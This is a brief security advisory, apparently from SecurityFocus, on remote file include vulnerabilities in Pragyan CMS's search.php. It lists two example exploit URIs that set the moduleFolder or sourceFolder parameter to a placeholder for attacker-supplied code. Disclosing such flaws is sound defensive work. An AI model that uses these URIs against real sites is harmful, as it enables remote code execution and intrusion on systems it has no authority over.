Pragyan CMS 'search.php' Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil]
http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil]


 

Privacy Statement
Copyright 2010, SecurityFocus